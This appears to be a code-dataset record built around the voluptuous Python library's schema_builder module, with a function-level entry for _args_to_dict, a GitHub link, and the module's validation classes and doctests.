        schema_arguments = _merge_args_with_kwargs(schema_args_dict, kw)
        if RETURNS_KEY in schema_arguments:
            returns_defined = True
            returns = schema_arguments[RETURNS_KEY]
            del schema_arguments[RETURNS_KEY]
        # ALLOW_EXTRA lets parameters without a declared schema through.
        input_schema = (Schema(schema_arguments, extra=ALLOW_EXTRA)
                        if len(schema_arguments) != 0 else lambda x: x)
        output_schema = Schema(returns) if returns_defined else lambda x: x

        @wraps(func)
        def func_wrapper(*args, **kwargs):
            args_dict = _args_to_dict(func, args)
            arguments = _merge_args_with_kwargs(args_dict, kwargs)
            validated_arguments = input_schema(arguments)
            # NOTE(review): all arguments are forwarded as keywords, so
            # positional-only parameters would break here — confirm intended.
            output = func(**validated_arguments)
            return output_schema(output)

        return func_wrapper

    return validate_schema_decorator
|
alecthomas/voluptuous | voluptuous/schema_builder.py | _args_to_dict | python | def _args_to_dict(func, args):
if sys.version_info >= (3, 0):
arg_count = func.__code__.co_argcount
arg_names = func.__code__.co_varnames[:arg_count]
else:
arg_count = func.func_code.co_argcount
arg_names = func.func_code.co_varnames[:arg_count]
arg_value_list = list(args)
arguments = dict((arg_name, arg_value_list[i])
for i, arg_name in enumerate(arg_names)
if i < len(arg_value_list))
return arguments | Returns argument names as values as key-value pairs. | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L1233-L1246 | null | import collections
import inspect
import re
from functools import wraps
import sys
from contextlib import contextmanager
import itertools
from voluptuous import error as er
# Python 2/3 compatibility aliases: normalise the names used throughout this
# module so the rest of the code can stay version-agnostic.
if sys.version_info >= (3,):
    long = int
    unicode = str
    basestring = str
    ifilter = filter

    def iteritems(d):
        # dict.items() is already a lazy view on Python 3.
        return d.items()
else:
    from itertools import ifilter

    def iteritems(d):
        return d.iteritems()

if sys.version_info >= (3, 3):
    # The abstract base classes moved to collections.abc in Python 3.3.
    _Mapping = collections.abc.Mapping
else:
    _Mapping = collections.Mapping
"""Schema validation for Python data structures.
Given eg. a nested data structure like this:
{
'exclude': ['Users', 'Uptime'],
'include': [],
'set': {
'snmp_community': 'public',
'snmp_timeout': 15,
'snmp_version': '2c',
},
'targets': {
'localhost': {
'exclude': ['Uptime'],
'features': {
'Uptime': {
'retries': 3,
},
'Users': {
'snmp_community': 'monkey',
'snmp_port': 15,
},
},
'include': ['Users'],
'set': {
'snmp_community': 'monkeys',
},
},
},
}
A schema like this:
>>> settings = {
... 'snmp_community': str,
... 'retries': int,
... 'snmp_version': All(Coerce(str), Any('3', '2c', '1')),
... }
>>> features = ['Ping', 'Uptime', 'Http']
>>> schema = Schema({
... 'exclude': features,
... 'include': features,
... 'set': settings,
... 'targets': {
... 'exclude': features,
... 'include': features,
... 'features': {
... str: settings,
... },
... },
... })
Validate like so:
>>> schema({
... 'set': {
... 'snmp_community': 'public',
... 'snmp_version': '2c',
... },
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {
... 'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'},
... },
... },
... }) == {
... 'set': {'snmp_version': '2c', 'snmp_community': 'public'},
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'}}}}
True
"""
# options for extra keys
PREVENT_EXTRA = 0 # any extra key not in schema will raise an error
ALLOW_EXTRA = 1 # extra keys not in schema will be included in output
REMOVE_EXTRA = 2 # extra keys not in schema will be excluded from output
def _isnamedtuple(obj):
return isinstance(obj, tuple) and hasattr(obj, '_fields')
primitive_types = (str, unicode, bool, int, float)
class Undefined(object):
    """Sentinel type meaning "no value was given"; instances are falsy."""

    def __nonzero__(self):  # Python 2 truth-value hook
        return False

    # Bug fix: Python 3 ignores __nonzero__ and calls __bool__; without this
    # alias UNDEFINED would evaluate truthy on Python 3, contradicting the
    # intent expressed by __nonzero__ above. Identity checks
    # (``value is UNDEFINED``) elsewhere in this module are unaffected.
    __bool__ = __nonzero__

    def __repr__(self):
        return '...'


# Module-wide singleton used as the "no default / no value" sentinel.
UNDEFINED = Undefined()
def Self():
    """Sentinel for self-referential (recursive) schemas.

    Schema._compile special-cases the Self object itself, so this body is
    only reached on misuse.
    """
    raise er.SchemaError('"Self" should never be called')
def default_factory(value):
    """Normalise *value* into a zero-argument callable producing it.

    The UNDEFINED sentinel and callables pass through unchanged; any other
    value is wrapped in a closure that returns it.
    """
    if value is UNDEFINED:
        return value
    if callable(value):
        return value
    return lambda: value
@contextmanager
def raises(exc, msg=None, regex=None):
    """Context manager asserting that the managed block raises *exc*.

    The exception is swallowed. Its text may additionally be checked:
    exact equality via *msg*, or a regular-expression search via *regex*.
    """
    try:
        yield
    except exc as e:
        text = str(e)
        if msg is not None:
            assert text == msg, '%r != %r' % (text, msg)
        if regex is not None:
            assert re.search(regex, text), '%r does not match %r' % (text, regex)
def Extra(_):
    """Allow keys in the data that are not present in the schema."""
    # Sentinel only: Schema._compile intercepts the Extra object itself,
    # so this body is only reached on misuse.
    raise er.SchemaError('"Extra" should never be called')


# As extra() is never called there's no way to catch references to the
# deprecated object, so we just leave an alias here instead.
extra = Extra
class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
    def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
        """Create a new Schema.

        :param schema: Validation schema. See :module:`voluptuous` for details.
        :param required: Keys defined in the schema must be in the data.
        :param extra: Specify how extra keys in the data are treated:
            - :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
              extra keys (raise ``Invalid``).
            - :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
              keys in the output.
            - :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
              from the output.
            - Any value other than the above defaults to
              :const:`~voluptuous.PREVENT_EXTRA`
        """
        self.schema = schema
        self.required = required
        self.extra = int(extra)  # ensure the value is an integer
        # Compile eagerly so schema definition errors surface at
        # construction time rather than on first validation.
        self._compiled = self._compile(schema)
    @classmethod
    def infer(cls, data, **kwargs):
        """Create a Schema from concrete data (e.g. an API response).

        For example, this will take a dict like:

        {
            'foo': 1,
            'bar': {
                'a': True,
                'b': False
            },
            'baz': ['purple', 'monkey', 'dishwasher']
        }

        And return a Schema:

        {
            'foo': int,
            'bar': {
                'a': bool,
                'b': bool
            },
            'baz': [str]
        }

        Note: only very basic inference is supported.
        """
        def value_to_schema_type(value):
            # Recurse into dicts and lists; empty containers degrade to the
            # bare container type since there is nothing to infer from.
            if isinstance(value, dict):
                if len(value) == 0:
                    return dict
                return {k: value_to_schema_type(v)
                        for k, v in iteritems(value)}
            if isinstance(value, list):
                if len(value) == 0:
                    return list
                else:
                    return [value_to_schema_type(v)
                            for v in value]
            # Scalars map to their concrete type.
            return type(value)

        return cls(value_to_schema_type(data), **kwargs)
    def __eq__(self, other):
        # Schemas compare by their raw (uncompiled) schema definition.
        if not isinstance(other, Schema):
            return False
        return other.schema == self.schema
    def __ne__(self, other):
        # Defined explicitly for Python 2, which does not derive != from ==.
        return not (self == other)
    def __str__(self):
        # Delegate to the raw schema's string form.
        return str(self.schema)
    def __repr__(self):
        # Include the extra-key policy by name for easier debugging.
        return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
            self.schema, self._extra_to_name.get(self.extra, '??'),
            self.required, id(self))
    def __call__(self, data):
        """Validate data against this schema."""
        try:
            return self._compiled([], data)
        except er.MultipleInvalid:
            raise
        except er.Invalid as e:
            # Normalise single errors so callers always see MultipleInvalid.
            raise er.MultipleInvalid([e])
        # return self.validate([], self.schema, data)
    def _compile(self, schema):
        """Dispatch *schema* to the matching compiler.

        Returns a ``validator(path, data)`` callable.
        """
        if schema is Extra:
            # Extra matches anything and passes it through unchanged.
            return lambda _, v: v
        if schema is Self:
            # Late binding: self._compiled is looked up at validation time,
            # which is what makes recursive schemas work.
            return lambda p, v: self._compiled(p, v)
        elif hasattr(schema, "__voluptuous_compile__"):
            # Objects may provide their own compilation hook.
            return schema.__voluptuous_compile__(self)
        if isinstance(schema, Object):
            return self._compile_object(schema)
        if isinstance(schema, _Mapping):
            return self._compile_dict(schema)
        elif isinstance(schema, list):
            return self._compile_list(schema)
        elif isinstance(schema, tuple):
            return self._compile_tuple(schema)
        elif isinstance(schema, (frozenset, set)):
            return self._compile_set(schema)
        type_ = type(schema)
        if inspect.isclass(schema):
            type_ = schema
        if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
                     list, dict, type(None)) or callable(schema):
            return _compile_scalar(schema)
        raise er.SchemaError('unsupported schema data type %r' %
                             type(schema).__name__)
    def _compile_mapping(self, schema, invalid_msg=None):
        """Create validator for given mapping.

        Returns a closure ``validate_mapping(path, iterable, out)`` that
        consumes ``(key, value)`` pairs and fills ``out``.
        """
        invalid_msg = invalid_msg or 'mapping value'

        # Keys that may be required
        all_required_keys = set(key for key in schema
                                if key is not Extra and
                                ((self.required and not isinstance(key, (Optional, Remove))) or
                                 isinstance(key, Required)))

        # Keys that may have defaults
        all_default_keys = set(key for key in schema
                               if isinstance(key, Required) or
                               isinstance(key, Optional))

        _compiled_schema = {}
        for skey, svalue in iteritems(schema):
            new_key = self._compile(skey)
            new_value = self._compile(svalue)
            _compiled_schema[skey] = (new_key, new_value)

        candidates = list(_iterate_mapping_candidates(_compiled_schema))

        # After we have the list of candidates in the correct order, we want to apply some
        # optimization so that each key in the data being validated will be matched against
        # the relevant schema keys only. No point in matching against different keys.
        additional_candidates = []
        candidates_by_key = {}
        for skey, (ckey, cvalue) in candidates:
            if type(skey) in primitive_types:
                candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
            elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
                candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
            else:
                # These are wildcards such as 'int', 'str', 'Remove' and others which should be
                # applied to all keys
                additional_candidates.append((skey, (ckey, cvalue)))

        def validate_mapping(path, iterable, out):
            required_keys = all_required_keys.copy()

            # Build a map of all provided key-value pairs.
            # The type(out) is used to retain ordering in case a ordered
            # map type is provided as input.
            key_value_map = type(out)()
            for key, value in iterable:
                key_value_map[key] = value

            # Insert default values for non-existing keys.
            for key in all_default_keys:
                if not isinstance(key.default, Undefined) and \
                        key.schema not in key_value_map:
                    # A default value has been specified for this missing
                    # key, insert it.
                    key_value_map[key.schema] = key.default()

            # NOTE(review): `error` tracks the deepest key-match failure but
            # is never raised or reported — appears vestigial.
            error = None
            errors = []
            for key, value in key_value_map.items():
                key_path = path + [key]
                remove_key = False

                # Optimization. Validate against the matching key first, then fallback to the rest
                relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)

                # compare each given key/value against all compiled key/values
                # schema key, (compiled key, compiled value)
                for skey, (ckey, cvalue) in relevant_candidates:
                    try:
                        new_key = ckey(key_path, key)
                    except er.Invalid as e:
                        if len(e.path) > len(key_path):
                            raise
                        if not error or len(e.path) > len(error.path):
                            error = e
                        continue
                    # Backtracking is not performed once a key is selected, so if
                    # the value is invalid we immediately throw an exception.
                    exception_errors = []
                    # check if the key is marked for removal
                    is_remove = new_key is Remove
                    try:
                        cval = cvalue(key_path, value)
                        # include if it's not marked for removal
                        if not is_remove:
                            out[new_key] = cval
                        else:
                            remove_key = True
                            continue
                    except er.MultipleInvalid as e:
                        exception_errors.extend(e.errors)
                    except er.Invalid as e:
                        exception_errors.append(e)

                    if exception_errors:
                        if is_remove or remove_key:
                            continue
                        for err in exception_errors:
                            if len(err.path) <= len(key_path):
                                err.error_type = invalid_msg
                            errors.append(err)
                        # If there is a validation error for a required
                        # key, this means that the key was provided.
                        # Discard the required key so it does not
                        # create an additional, noisy exception.
                        required_keys.discard(skey)
                        break

                    # Key and value okay, mark as found in case it was
                    # a Required() field.
                    required_keys.discard(skey)

                    break
                else:
                    # for/else: no schema key matched this data key at all.
                    if remove_key:
                        # remove key
                        continue
                    elif self.extra == ALLOW_EXTRA:
                        out[key] = value
                    elif self.extra != REMOVE_EXTRA:
                        errors.append(er.Invalid('extra keys not allowed', key_path))
                        # else REMOVE_EXTRA: ignore the key so it's removed from output

            # for any required keys left that weren't found and don't have defaults:
            for key in required_keys:
                msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
                errors.append(er.RequiredFieldInvalid(msg, path + [key]))
            if errors:
                raise er.MultipleInvalid(errors)

            return out

        return validate_mapping
    def _compile_object(self, schema):
        """Validate an object.

        Has the same behavior as dictionary validator but work with object
        attributes.

        For example:

        >>> class Structure(object):
        ...     def __init__(self, one=None, three=None):
        ...         self.one = one
        ...         self.three = three
        ...
        >>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
        >>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
        ...   validate(Structure(one='three'))
        """
        base_validate = self._compile_mapping(
            schema, invalid_msg='object value')

        def validate_object(path, data):
            if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
                raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
            # Attributes whose value is None are skipped entirely.
            iterable = _iterate_object(data)
            iterable = ifilter(lambda item: item[1] is not None, iterable)
            out = base_validate(path, iterable, {})
            # Rebuild an instance of the same class from the validated
            # attributes (assumes the class accepts them as kwargs).
            return type(data)(**out)

        return validate_object
    def _compile_dict(self, schema):
        """Validate a dictionary.

        A dictionary schema can contain a set of values, or at most one
        validator function/type.

        A dictionary schema will only validate a dictionary:

            >>> validate = Schema({})
            >>> with raises(er.MultipleInvalid, 'expected a dictionary'):
            ...   validate([])

        An invalid dictionary value:

            >>> validate = Schema({'one': 'two', 'three': 'four'})
            >>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
            ...   validate({'one': 'three'})

        An invalid key:

            >>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
            ...   validate({'two': 'three'})

        Validation function, in this case the "int" type:

            >>> validate = Schema({'one': 'two', 'three': 'four', int: str})

        Valid integer input:

            >>> validate({10: 'twenty'})
            {10: 'twenty'}

        By default, a "type" in the schema (in this case "int") will be used
        purely to validate that the corresponding value is of that type. It
        will not Coerce the value:

            >>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
            ...   validate({'10': 'twenty'})

        Wrap them in the Coerce() function to achieve this:

            >>> from voluptuous import Coerce
            >>> validate = Schema({'one': 'two', 'three': 'four',
            ...                    Coerce(int): str})
            >>> validate({'10': 'twenty'})
            {10: 'twenty'}

        Custom message for required key

            >>> validate = Schema({Required('one', 'required'): 'two'})
            >>> with raises(er.MultipleInvalid, "required @ data['one']"):
            ...   validate({})

        (This is to avoid unexpected surprises.)

        Multiple errors for nested field in a dict:

        >>> validate = Schema({
        ...     'adict': {
        ...         'strfield': str,
        ...         'intfield': int
        ...     }
        ... })
        >>> try:
        ...     validate({
        ...         'adict': {
        ...             'strfield': 123,
        ...             'intfield': 'one'
        ...         }
        ...     })
        ... except er.MultipleInvalid as e:
        ...     print(sorted(str(i) for i in e.errors))  # doctest: +NORMALIZE_WHITESPACE
        ["expected int for dictionary value @ data['adict']['intfield']",
         "expected str for dictionary value @ data['adict']['strfield']"]
        """
        base_validate = self._compile_mapping(
            schema, invalid_msg='dictionary value')

        # Group Exclusive/Inclusive markers by their group label so the
        # cross-key constraints can be checked before per-key validation.
        groups_of_exclusion = {}
        groups_of_inclusion = {}
        for node in schema:
            if isinstance(node, Exclusive):
                g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
                g.append(node)
            elif isinstance(node, Inclusive):
                g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
                g.append(node)

        def validate_dict(path, data):
            if not isinstance(data, dict):
                raise er.DictInvalid('expected a dictionary', path)

            errors = []
            # At most one key per exclusion group may be present.
            for label, group in groups_of_exclusion.items():
                exists = False
                for exclusive in group:
                    if exclusive.schema in data:
                        if exists:
                            msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
                                "two or more values in the same group of exclusion '%s'" % label
                            next_path = path + [VirtualPathComponent(label)]
                            errors.append(er.ExclusiveInvalid(msg, next_path))
                            break
                        exists = True

            if errors:
                raise er.MultipleInvalid(errors)

            # Keys of an inclusion group must appear together (all or none).
            for label, group in groups_of_inclusion.items():
                included = [node.schema in data for node in group]
                if any(included) and not all(included):
                    msg = "some but not all values in the same group of inclusion '%s'" % label
                    for g in group:
                        if hasattr(g, 'msg') and g.msg:
                            msg = g.msg
                            break
                    next_path = path + [VirtualPathComponent(label)]
                    errors.append(er.InclusiveInvalid(msg, next_path))
                    break

            if errors:
                raise er.MultipleInvalid(errors)

            # Preserve the input's mapping type (e.g. OrderedDict) in output.
            out = data.__class__()
            return base_validate(path, iteritems(data), out)

        return validate_dict
    def _compile_sequence(self, schema, seq_type):
        """Validate a sequence type.

        This is a sequence of valid values or validators tried in order.

        >>> validator = Schema(['one', 'two', int])
        >>> validator(['one'])
        ['one']
        >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
        ...   validator([3.5])
        >>> validator([1])
        [1]
        """
        _compiled = [self._compile(s) for s in schema]
        seq_type_name = seq_type.__name__

        def validate_sequence(path, data):
            if not isinstance(data, seq_type):
                raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)

            # Empty seq schema, allow any data.
            if not schema:
                if data:
                    raise er.MultipleInvalid([
                        er.ValueInvalid('not a valid value', [value]) for value in data
                    ])
                return data

            out = []
            invalid = None
            errors = []
            index_path = UNDEFINED
            for i, value in enumerate(data):
                index_path = path + [i]
                invalid = None
                # First matching sub-schema wins for each element.
                for validate in _compiled:
                    try:
                        cval = validate(index_path, value)
                        if cval is not Remove:  # do not include Remove values
                            out.append(cval)
                        break
                    except er.Invalid as e:
                        if len(e.path) > len(index_path):
                            raise
                        invalid = e
                else:
                    # for/else: nothing matched; report the last failure.
                    errors.append(invalid)

            if errors:
                raise er.MultipleInvalid(errors)

            if _isnamedtuple(data):
                # namedtuples must be rebuilt positionally, not from a list.
                return type(data)(*out)
            else:
                return type(data)(out)

        return validate_sequence
    def _compile_tuple(self, schema):
        """Validate a tuple.

        A tuple is a sequence of valid values or validators tried in order.

        >>> validator = Schema(('one', 'two', int))
        >>> validator(('one',))
        ('one',)
        >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
        ...   validator((3.5,))
        >>> validator((1,))
        (1,)
        """
        # Thin wrapper: shares all logic with list validation.
        return self._compile_sequence(schema, tuple)
    def _compile_list(self, schema):
        """Validate a list.

        A list is a sequence of valid values or validators tried in order.

        >>> validator = Schema(['one', 'two', int])
        >>> validator(['one'])
        ['one']
        >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
        ...   validator([3.5])
        >>> validator([1])
        [1]
        """
        # Thin wrapper: shares all logic with tuple validation.
        return self._compile_sequence(schema, list)
    def _compile_set(self, schema):
        """Validate a set.

        A set is an unordered collection of unique elements.

        >>> validator = Schema({int})
        >>> validator(set([42])) == set([42])
        True
        >>> with raises(er.Invalid, 'expected a set'):
        ...   validator(42)
        >>> with raises(er.MultipleInvalid, 'invalid value in set'):
        ...   validator(set(['a']))
        """
        type_ = type(schema)
        type_name = type_.__name__

        def validate_set(path, data):
            if not isinstance(data, type_):
                raise er.Invalid('expected a %s' % type_name, path)

            # NOTE(review): sub-schemas are recompiled on every call here,
            # unlike the other _compile_* methods which compile once.
            _compiled = [self._compile(s) for s in schema]
            errors = []
            for value in data:
                for validate in _compiled:
                    try:
                        validate(path, value)
                        break
                    except er.Invalid:
                        pass
                else:
                    invalid = er.Invalid('invalid value in %s' % type_name, path)
                    errors.append(invalid)

            if errors:
                raise er.MultipleInvalid(errors)

            # The input set is returned as-is (values are not converted).
            return data

        return validate_set
    def extend(self, schema, required=None, extra=None):
        """Create a new `Schema` by merging this and the provided `schema`.

        Neither this `Schema` nor the provided `schema` are modified. The
        resulting `Schema` inherits the `required` and `extra` parameters of
        this, unless overridden.

        Both schemas must be dictionary-based.

        :param schema: dictionary to extend this `Schema` with
        :param required: if set, overrides `required` of this `Schema`
        :param extra: if set, overrides `extra` of this `Schema`
        """
        assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'

        result = self.schema.copy()

        # returns the key that may have been passed as argument to Marker constructor
        def key_literal(key):
            return (key.schema if isinstance(key, Marker) else key)

        # build a map that takes the key literals to the needed objects
        # literal -> Required|Optional|literal
        result_key_map = dict((key_literal(key), key) for key in result)

        # for each item in the extension schema, replace duplicates
        # or add new keys
        for key, value in iteritems(schema):

            # if the key is already in the dictionary, we need to replace it
            # transform key to literal before checking presence
            if key_literal(key) in result_key_map:

                result_key = result_key_map[key_literal(key)]
                result_value = result[result_key]

                # if both are dictionaries, we need to extend recursively
                # create the new extended sub schema, then remove the old key and add the new one
                if type(result_value) == dict and type(value) == dict:
                    new_value = Schema(result_value).extend(value).schema
                    del result[result_key]
                    result[key] = new_value
                # one or the other or both are not sub-schemas, simple replacement is fine
                # remove old key and add new one
                else:
                    del result[result_key]
                    result[key] = value

            # key is new and can simply be added
            else:
                result[key] = value

        # recompile and send old object
        result_cls = type(self)
        result_required = (required if required is not None else self.required)
        result_extra = (extra if extra is not None else self.extra)
        return result_cls(result, required=result_required, extra=result_extra)
def _compile_scalar(schema):
    """A scalar value.

    The schema can either be a value or a type.

    >>> _compile_scalar(int)([], 1)
    1
    >>> with raises(er.Invalid, 'expected float'):
    ...   _compile_scalar(float)([], '1')

    Callables are invoked to validate (and possibly convert) the value:

    >>> _compile_scalar(lambda v: float(v))([], '1')
    1.0

    As a convenience, ValueError's are trapped:

    >>> with raises(er.Invalid, 'not a valid value'):
    ...   _compile_scalar(lambda v: float(v))([], 'a')
    """
    if inspect.isclass(schema):
        # A type: pure isinstance check, no coercion.
        def validate_instance(path, data):
            if isinstance(data, schema):
                return data
            else:
                msg = 'expected %s' % schema.__name__
                raise er.TypeInvalid(msg, path)

        return validate_instance

    if callable(schema):
        def validate_callable(path, data):
            try:
                return schema(data)
            except ValueError as e:
                # ValueError is treated as "invalid value" for convenience.
                raise er.ValueInvalid('not a valid value', path)
            except er.Invalid as e:
                e.prepend(path)
                raise

        return validate_callable

    # Anything else: literal equality match.
    def validate_value(path, data):
        if data != schema:
            raise er.ScalarInvalid('not a valid value', path)
        return data

    return validate_value
def _compile_itemsort():
    '''return sort function of mappings'''
    def is_extra(key_):
        return key_ is Extra

    def is_remove(key_):
        return isinstance(key_, Remove)

    def is_marker(key_):
        return isinstance(key_, Marker)

    def is_type(key_):
        return inspect.isclass(key_)

    def is_callable(key_):
        return callable(key_)

    # priority list for map sorting (in order of checking)
    # We want Extra to match last, because it's a catch-all. On the other hand,
    # Remove markers should match first (since invalid values will not
    # raise an Error, instead the validator will check if other schemas match
    # the same value).
    #
    # NOTE: the integer is the *sort* priority; the list order below is the
    # *check* order, which is why is_type (4) is tested before is_callable
    # (3) — classes are callable too and must be classified as types.
    priority = [(1, is_remove),  # Remove highest priority after values
                (2, is_marker),  # then other Markers
                (4, is_type),  # types/classes lowest before Extra
                (3, is_callable),  # callables after markers
                (5, is_extra)]  # Extra lowest priority

    def item_priority(item_):
        key_ = item_[0]
        for i, check_ in priority:
            if check_(key_):
                return i
        # values have highest priorities
        return 0

    return item_priority


# Module-level sort key shared by _iterate_mapping_candidates.
_sort_item = _compile_itemsort()
def _iterate_mapping_candidates(schema):
    """Iterate over schema in a meaningful order."""
    # Without this, Extra might appear first in the iterator, and fail to
    # validate a key even though it's a Required that has its own validation,
    # generating a false positive.
    return sorted(iteritems(schema), key=_sort_item)
def _iterate_object(obj):
    """Return iterator over object attributes. Respect objects with
    defined __slots__.

    Yields ``(name, value)`` pairs from ``vars(obj)`` (or ``_asdict()`` for
    namedtuples), then from ``__slots__`` if present.
    """
    d = {}
    try:
        d = vars(obj)
    except TypeError:
        # maybe we have named tuple here?
        if hasattr(obj, '_asdict'):
            d = obj._asdict()
    for item in iteritems(d):
        yield item
    try:
        slots = obj.__slots__
    except AttributeError:
        pass
    else:
        # '__dict__' may itself appear in __slots__; its contents were
        # already yielded above.
        for key in slots:
            if key != '__dict__':
                yield (key, getattr(obj, key))
class Msg(object):
    """Report a user-friendly message if a schema fails to validate.

    >>> validate = Schema(
    ...   Msg(['one', 'two', int],
    ...       'should be one of "one", "two" or an integer'))
    >>> with raises(er.MultipleInvalid, 'should be one of "one", "two" or an integer'):
    ...   validate(['three'])

    Messages are only applied to invalid direct descendants of the schema:

    >>> validate = Schema(Msg([['one', 'two', int]], 'not okay!'))
    >>> with raises(er.MultipleInvalid, 'expected int @ data[0][0]'):
    ...   validate([['three']])

    The type which is thrown can be overridden but needs to be a subclass of Invalid

    >>> with raises(er.SchemaError, 'Msg can only use subclases of Invalid as custom class'):
    ...   validate = Schema(Msg([int], 'should be int', cls=KeyError))

    If you do use a subclass of Invalid, that error will be thrown (wrapped in a MultipleInvalid)

    >>> validate = Schema(Msg([['one', 'two', int]], 'not okay!', cls=er.RangeInvalid))
    >>> try:
    ...   validate(['three'])
    ... except er.MultipleInvalid as e:
    ...   assert isinstance(e.errors[0], er.RangeInvalid)
    """

    def __init__(self, schema, msg, cls=None):
        # Reject non-Invalid classes up front so misuse fails loudly at
        # schema-construction time, not mid-validation.
        if cls and not issubclass(cls, er.Invalid):
            raise er.SchemaError("Msg can only use subclases of"
                                 " Invalid as custom class")
        self._schema = schema  # raw schema kept for repr()
        self.schema = Schema(schema)  # compiled form used for validation
        self.msg = msg
        self.cls = cls

    def __call__(self, v):
        # Replace only shallow failures (direct descendants) with the
        # custom message; deeper errors keep their precise message.
        try:
            return self.schema(v)
        except er.Invalid as e:
            if len(e.path) > 1:
                raise e
            else:
                raise (self.cls or er.Invalid)(self.msg)

    def __repr__(self):
        return 'Msg(%s, %s, cls=%s)' % (self._schema, self.msg, self.cls)
class Object(dict):
    """Indicate that we should work with attributes, not keys."""

    def __init__(self, schema, cls=UNDEFINED):
        # cls restricts validation to instances of that class; the
        # UNDEFINED sentinel means "any object is acceptable".
        self.cls = cls
        super(Object, self).__init__(schema)
class VirtualPathComponent(str):
    """A synthetic error-path element (e.g. a group label), shown as '<name>'.

    Note: string join is used deliberately; ``%s`` or ``str.format`` would
    re-enter ``__str__`` and recurse.
    """

    def __str__(self):
        return ''.join(('<', self, '>'))

    def __repr__(self):
        return self.__str__()
# Markers.py
class Marker(object):
    """Mark nodes for special treatment."""

    def __init__(self, schema_, msg=None, description=None):
        self.schema = schema_  # raw schema as supplied by the user
        self._schema = Schema(schema_)  # compiled form used for validation
        self.msg = msg
        self.description = description

    def __call__(self, v):
        # Validate v; substitute self.msg only for shallow failures so
        # nested error paths keep their precise messages.
        try:
            return self._schema(v)
        except er.Invalid as e:
            if not self.msg or len(e.path) > 1:
                raise
            raise er.Invalid(self.msg)

    def __str__(self):
        return str(self.schema)

    def __repr__(self):
        return repr(self.schema)

    def __lt__(self, other):
        # Order markers by their wrapped schema so they sort alongside
        # plain (unwrapped) keys.
        if isinstance(other, Marker):
            return self.schema < other.schema
        return self.schema < other

    def __hash__(self):
        return hash(self.schema)

    def __eq__(self, other):
        # A marker compares (and hashes) equal to its wrapped schema value,
        # which lets dict lookups find marker keys by the raw key.
        return self.schema == other

    def __ne__(self, other):
        return not(self.schema == other)
class Optional(Marker):
    """Mark a node in the schema as optional, and optionally provide a default
    >>> schema = Schema({Optional('key'): str})
    >>> schema({})
    {}
    >>> schema = Schema({Optional('key', default='value'): str})
    >>> schema({})
    {'key': 'value'}
    >>> schema = Schema({Optional('key', default=list): list})
    >>> schema({})
    {'key': []}
    If 'required' flag is set for an entire schema, optional keys aren't required
    >>> schema = Schema({
    ...     Optional('key'): str,
    ...     'key2': str
    ... }, required=True)
    >>> schema({'key2':'value'})
    {'key2': 'value'}
    """
    def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
        super(Optional, self).__init__(schema, msg=msg,
                                       description=description)
        # Normalise `default` into a zero-argument factory (UNDEFINED and
        # callables pass through unchanged); the mapping compiler calls the
        # factory to fill in values for keys missing from the input.
        self.default = default_factory(default)
class Exclusive(Optional):
    """Mark a node in the schema as exclusive.
    Exclusive keys inherited from Optional:
    >>> schema = Schema({Exclusive('alpha', 'angles'): int, Exclusive('beta', 'angles'): int})
    >>> schema({'alpha': 30})
    {'alpha': 30}
    Keys inside a same group of exclusion cannot be together, it only makes sense for dictionaries:
    >>> with raises(er.MultipleInvalid, "two or more values in the same group of exclusion 'angles' @ data[<angles>]"):
    ...     schema({'alpha': 30, 'beta': 45})
    For example, API can provides multiple types of authentication, but only one works in the same time:
    >>> msg = 'Please, use only one type of authentication at the same time.'
    >>> schema = Schema({
    ...     Exclusive('classic', 'auth', msg=msg):{
    ...         Required('email'): basestring,
    ...         Required('password'): basestring
    ...     },
    ...     Exclusive('internal', 'auth', msg=msg):{
    ...         Required('secret_key'): basestring
    ...     },
    ...     Exclusive('social', 'auth', msg=msg):{
    ...         Required('social_network'): basestring,
    ...         Required('token'): basestring
    ...     }
    ... })
    >>> with raises(er.MultipleInvalid, "Please, use only one type of authentication at the same time. @ data[<auth>]"):
    ...     schema({'classic': {'email': 'foo@example.com', 'password': 'bar'},
    ...             'social': {'social_network': 'barfoo', 'token': 'tEMp'}})
    """
